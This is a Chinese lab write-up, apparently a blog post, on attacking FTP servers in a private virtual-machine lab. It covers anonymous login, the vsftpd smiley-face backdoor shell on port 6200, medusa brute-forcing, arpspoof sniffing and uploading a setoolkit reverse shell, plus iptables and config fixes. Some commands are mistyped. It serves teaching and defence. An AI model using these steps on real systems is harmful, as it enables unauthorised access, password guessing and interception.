FTP笑脸漏洞

首先保证虚03拟机,kali虚拟机,metasploitable虚拟机主机相互ping的通。
FTP是C/S的模式。位于网络传输协议的应用层,21号端口通信。
03 ip 192.168.10.128
metasploitable ip 192.168.10.129 (简称meta)
kali ip 192.168.10.133
主机 ip 192.168.1.4
FTP在03,meta上搭建。

站点搭建
控制面板-》添加或删除程序-》添加删除组件-》应用程序服务器-》IIS的详细信息-》勾选FTP服务。
然后搭建的站点IIS中才会出现FTP站点

在kali上操作正常登陆
nc 192.168.10.128 21
user xxx
pass xxx
在kaili上匿名登陆
nc 192.168.10.128 21
user anonymous
pass 123 (密码输任意均可)
采用匿名登陆的方法
在这里插入图片描述
要勾选允许匿名连接
利用nmap探测漏洞笑脸漏洞
nmap --script=vuln -p 21 192.168.1.133
在这里插入图片描述
这就是笑脸漏洞,当FTP认证时,如果用户名中包含:) 则会出发监听6200号端接口的连接的shell
此时用nmap -p 6200 192.168.10.133查看连接情况
在这里插入图片描述
进行nc 192.168.10.133连接后
在这里插入图片描述
在这里插入图片描述
然后连接6200端口
在这里插入图片描述
完成漏洞利用
安全配置

防火墙 (解决后门)

iptables -A INPUT -p tcp -dport 6200 -j DROP
建立入站规则,不能从6200号端口进来
iptables -A OUTPUT -p tcp sport 6200 -j DROP
建立出站规则,不能从6200号端口出去

更改配置文件(解决匿名漏洞)

vsftp.conf allow_anonymous = no

FTP暴力破解
使用工具medusa(apt-get install medus)
medusa -h 192.168.10.128 -u admin1 -P /root/Desktop/dic.txt -M ftp
FTP嗅探(apt-get install dsniff)
(后来发现这个不成功,用另一台ubunt完成了这个实验,因为主机和kali不在同一网段)
使用arpspoof
arpsnoof - i eth0 192.168.1.1 -t 192.168.1.4
这里的ip是要欺骗的主机的网关和ip,eth0是kali的网卡。

FTP上传shell(在kali中生成,在主机中向03的FTP服务器上传)
使用setoolkit生成反弹shell。
通过xftp上传(一个软件)或者通过命令行上传
命令行
ftp 192.168.10.128
admin1
admin1
输入命令 PUT 文件路径
上传成功后
sessions -l 查看所有上传的连接
sessions - i 1 使用连接1

遇到的问题
错把03主机的Microsoft FTP Service当作笑脸漏洞。
FTP站点匿名登陆失败,重新安装了一遍成功了。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值